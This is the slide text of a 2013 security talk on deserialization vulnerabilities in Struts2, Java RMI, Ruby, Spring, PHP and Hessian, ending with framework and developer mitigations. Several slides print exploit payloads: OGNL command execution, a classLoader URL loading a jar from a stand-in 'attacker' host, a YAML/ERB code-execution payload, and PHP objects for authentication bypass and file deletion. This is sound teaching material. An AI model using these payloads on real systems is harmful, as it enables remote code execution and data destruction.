Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Serial Killers - or Deserialization for fun and profit

451 views

Published on

Overview of different published de-serialization flaws in multiple different frameworks; Java, RMI, Struts, Spring, Ruby, PHP etc. Presented at Opkoko 2013.1.

Published in: Technology, Education
  • Be the first to comment

  • Be the first to like this

Serial Killers - or Deserialization for fun and profit

  1. 1. Peter Magnusson Twitter: @blaufish_ omegapoint.se sakerhetspodcasten.se Serial Killers or Deserializing for fun and profit Unserialize this! Okay! bomb!
  2. 2. Intro Broken? Dirty? Native? FINImprove
  3. 3. ID: 123 TYPE: 3 ID: 123 TYPE: 3 ID: 123 TYPE: 3 unserializeserialize
  4. 4. Ubiquitous Binary Web Forms File Storage XML JSON GWT Machine <-> Machine Man <-> Machine Machine <-> temp <-> Machine RPC View State Event Validation Form Auth Cookie JSON
  5. 5. The Old Way tempBytes1 = read(stream, 2); data.id = convertNetworkBytesToInt(tempBytes1); tempBytes2 = read(stream, 2); data.type = convertNetworkBytesToInt(tempBytes2);
  6. 6. The New Way data = unserialize( stream ) MAGIC GLUE!
  7. 7. Unserialize this! Okay! bomb!
  8. 8. Intro Broken? Dirty? Native? FINImprove
  9. 9. What if magic glue … …is terribly broken?
  10. 10. Java Struts2/XWork
  11. 11. username=foo&password=bar
  12. 12. /struts2-blank-2.1.8.1/example/Login.action xwork2.util.ValueStack.setValue( expr, value ) new Login() login.setUsername("foo") username=foo&password=bar login.setPassword("bar") OgnlUtil.setValue(expr, …); Ognl.setValue(compile(name), …);
  13. 13. VULNERABILITY: Executes any OGNL language commands (i.e. any java) with insufficient filtering EXPLOIT: #_memberAccess['allowStaticMethodAccess'] = true #foo = new java .lang.Boolean("false") #context['xwork.MethodAccessor.denyMethodExecution'] = #foo #rt = @java.lang.Runtime@getRuntime() #rt.exec('mkdir /tmp/PWNED') http://www.exploit-db.com/exploits/18329/ - Johannes Dahse, Andreas Nusser, 2011 http://www.exploit-db.com/exploits/14360/ - Meder Kydyraliev, 2010
  14. 14. http://127.0.0.1:8081/struts2-blank- 2.1.8.1/example/HelloWorld.action?('u0023_ memberAccess['allowStaticMethodAccess']') (meh)=true&(aaa)(('u0023context['xwork.M ethodAccessor.denyMethodExecution']u003 du0023foo')(u0023foou003dnew%20java.la ng.Boolean(%22false%22)))&(asdf)(('u0023rt. exit(1)')(u0023rtu003d@java.lang.Runtime @getRuntime()))=1
  15. 15. protected boolean acceptableName(String name) { if (name.indexOf('=') != -1 || name.indexOf(',') != -1 || name.indexOf('#') != -1 || name.indexOf(':') != -1 || name.indexOf("u0023") != -1) { return false; 2006 private String acceptedParamNames = "[[p{Graph}s]&&[^,#:=]]*"; 2010 private String acceptedParamNames = "[a-zA-Z0-9.][_'s]+"; fix public static final String ACCEPTED_PARAM_NAMES = "w+((.w+)|([d+])|((d+))|(['w+'])|(('w+')))*"; protected static final int PARAM_NAME_MAX_LENGTH = 100; later This code has ALWAYS been DANGEROUS, protected by input validation only. Somewhere between 2006 and 2010 the u0023 version of # got lost.
  16. 16. Revision 956389 - (view) (download) (annotate) - [select for diffs] Modified Sun Jun 20 19:20:11 2010 UTC (2 years, 9 months ago) Resolved critical Xwork vulnerability Revision 956397 - (view) (download) (annotate) - [select for diffs] Modified Sun Jun 20 19:48:18 2010 UTC (2 years, 9 months ago) Slight update to accepted parameters name pattern to accept also ( and ) Revision 1129979 - (view) (download) (annotate) - [select for diffs] Modified Wed Jun 1 00:30:25 2011 UTC (22 months, 1 week ago) XW-386 allow x['y'] as well as x.y Revision 1234212 - (view) (download) (annotate) - [select for diffs] Modified Sat Jan 21 00:04:43 2012 UTC (14 months, 2 weeks ago) Security issue fixed (see [1] for further details) [1] https://cwiki.apache.org/confluence/display/WW/S2-009 Revision 1368841 - (view) (download) (annotate) - [select for diffs] Modified Fri Aug 3 09:16:47 2012 UTC (8 months, 1 week ago) WW-3860 Restrict accepted parameter name length Thanks to Johno Crawford for the patch. 1. Regexp 2. Extensible 3. Purpose & proper use not well defined Not an easy fix!
  17. 17. Java / RMI
  18. 18. VULNERABILITY: The class annotation is resolved during deserialization using the ObjectInputStream.resolveClass method. The resolveClass reads from ObjectInputStream.readObject. If the annotation, a codebase URL, is non-null, then it obtains the classloader for that URL and attempts to load the class. EXPLOIT: P?? w" ??????Cur [Ljava.rmi.server.ObjID;? ??,d~ pxp sr metasploit.RMILoader?eD?&??? t file:./rmidummy.jarxpw http://www.metasploit.com/modules/exploit/multi/misc/java_rmi_server http://docs.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol4.html
  19. 19. Ruby
  20. 20. VULNERABILITY: XML_FORMATTING = { … "yaml" => Proc.new { |yaml| yaml.to_yaml } … when "yaml" then YAML::load(content) rescue content EXPLOIT: <fail type="yaml"> --- !ruby/object:ERB template: src: !binary |- #{Base64.encode64(code)} </fail> http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution- vulnerability-explained/
  21. 21. Intro Broken? Dirty? Native? FINImprove
  22. 22. What if magic glue … …introduce dirty objects?
  23. 23. Java Spring/Tomcat/Jasper
  24. 24. java.beans.PropertyDescriptor getWriteMethod("username") ?username=foo invoke("foo")
  25. 25. VULNERABILITY: Spring unserialize using Java Bean API. Spring allows poisoning Object.classLoader property. Jasper will heed Object.classLoader upon loading tag files. EXPLOIT: class.classLoader.URLs[0]=jar:http://attacker/spring- exploit.jar!/ /META-INF/tags/InputTag.tag: <%@ tag dynamic-attributes="dynattrs" %> <% java.lang.Runtime.getRuntime().exec("mkdir /tmp/PWNED"); %> http://blog.o0o.nu/2010/06/cve-2010-1622.html - Meder Kydyraliev
  26. 26. java.beans ?class.classLoader.urls[0]=jar:http://attacker/exploit.jar!/ Object.getClass() Class.getClassLoader() org.apache.catalina.loader. WebappClassLoader.getUrls() Array.set(array, 0, new URL("jar:http://attacker/exploit.jar!/") ) Object.getClass.getClassLoader().load() exploit.jar
  27. 27. "Specify the stop class: BeanInfo info = Introspector.getBeanInfo(Person.class, Object.class)" "There's a lot more code out there that doesn't specify stop class, some of it has to have security implications." MEDER KYDYRALIEV. SUNDAY, JUNE 20, 2010 2013?
  28. 28. PHP
  29. 29. From SektionEins, Stefan Esser http://www.suspekt.org/downloads/POC2009-ShockingNewsInPHPExploitation.pdf VULNERABILITY: $data = unserialize($autologin); if ($data['username'] == $adminName && $data['password'] == $adminPassword) { EXPLOIT: a:2:{s:8:"username";b:1;s:8:"password";b:1;}
  30. 30. http://heine.familiedeelstra.com/security/unserialize VULNERABILITY function __destruct() { if ($this->_temp_tarname != '') { @drupal_unlink($this->_temp_tarname); EXPLOIT: O:11:"Archive_Tar":6:{s:8:"_tarname";N;s:9:"_compress";b:0;s: 14:"_compress_type";s:4:"none";s:10:"_separator";s:1:" ";s:5:"_file";i:0;s:13:"_temp_tarname";s:0:"";} (change _temp_tarname string to whatever file to delete)
  31. 31. Intro Broken? Dirty? Native? FINImprove
  32. 32. What if magic glue … …expose native code?
  33. 33. Java/Hessian
  34. 34. EXPOSES NATIVE ZLIB: public Hessian2Input unwrapHeaders(Hessian2Input in) throws IOException { InputStream is = new DeflateInputStream(in); OLD ZLIB VULNERNABILITIES: zlib inflate() routine vulnerable to buffer overflow The zlib compression library is vulnerable to a denial-of-service condition
  35. 35. Intro Broken? Dirty? Native? FINImprove
  36. 36. Frameworks MUST NOT: have a f**ing Turing-complete “do anything” execution engine for serialization
  37. 37. Frameworks SHOULD: Implement a WHITE LIST approach rather than allow anything. (public != safe) @WebSerializable class PayFormController { @WebSerializable public void setAccount(String account);
  38. 38. Developers SHOULD: Only use safe classes for unserializing. Don’t have potentially dangerous code in classes you intend to unserialize setAccount setAmount setClassLoader setTempFile setDate destroyMankind
  39. 39. Frameworks & Developers SHOULD: (where applicable) require data authenticity (pattern used in VIEWSTATE, EVENTVALIDATION, & Forms Authentication Cookies) serialized data Auth HMAC( M, server key )M If Auth != HMAC(M, key) abort!
  40. 40. Intro Broken? Dirty? Native? FINImprove
  41. 41. common shared problems Frameworks & devs should act upon it DO NOT execute input DO whitelist approach only safe code in data classes require data authenticity load code from external url

×